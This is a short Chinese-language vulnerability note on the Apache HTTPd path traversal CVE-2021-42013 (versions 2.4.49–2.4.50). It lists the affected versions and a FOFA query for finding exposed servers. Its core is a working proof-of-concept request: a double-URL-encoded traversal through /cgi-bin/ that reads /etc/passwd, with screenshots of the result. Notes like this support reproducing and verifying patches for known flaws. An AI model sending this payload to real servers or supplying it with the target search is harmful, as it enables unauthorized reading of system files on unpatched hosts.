# Apache HTTPd 路径穿越漏洞 CVE-2021-42013

## 漏洞描述

Apache HTTPD是一款HTTP服务器，它可以通过mod_php来运行PHP网页。其2.4.49~2.4.50-本中存在一个漏洞，可读取服务器中的任意文件 （CVE-2021-41773 的漏洞绕过）

## 漏洞影响

```
Apache HTTPd 2.4.49~2.4.50版本
```

## FOFA

```
server="Apache/2.4.49"
```

## 漏洞复现

Chorme插件Wappalyzer获取 Apache版本

![image-20220525155347737](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251553798.png)

验证POC

```
/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd
```

![image-20220525155420331](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251554399.png)